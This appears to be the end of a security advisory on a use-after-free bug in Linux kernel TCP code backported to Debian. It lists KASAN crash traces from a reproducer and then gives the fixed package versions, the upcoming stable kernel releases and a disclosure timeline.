BUG: KASAN: use-after-free in tcp_wfree+0x17/0xe0 at addr ffff8801eb449b00 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_wfree+0x27/0xe0 at addr ffff8801eb449bc8 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x8a/0xf0 at addr ffff8801eb449b58 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0xa6/0xf0 at addr ffff8801eb449b60 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_all+0x1a/0x30 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_data+0x1a/0x140 at addr ffff8801eb449bb4 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_data+0x2d/0x140 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_data+0x40/0x140 at addr ffff8801eb449b76 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in kfree_skbmem+0x15/0x80 at addr ffff8801eb449b76 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_init_tso_segs+0x1e/0xc0 at addr ffff8801eb449a30 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_write_xmit+0x51b/0x1d50 at addr ffff8801eb449a34 - Read of size 1 by task rep/29723

Recommendation

This bug was introduced by backports of commit 7f582b248d0a (“tcp: purge write queue in tcp_connect_init()”). Apply security updates included with DSA 4497-1.

The vulnerability has been addressed in Debian 3.16.72-1, 4.9.168-1+deb9u5~deb8u1 and 4.9.168-1+deb9u5.

The fix should be included in the upcoming stable releases:

  • 3.16.73
  • 4.4.190
  • 4.9.190
  • 4.14.139

Timeline

21/05/2019 - Initial email to Debian security team
26/05/2019 - Debian security team identified a potential patch
06/08/2019 - Patch file received from Debian, confirming a fix
14/08/2019 - Advisory released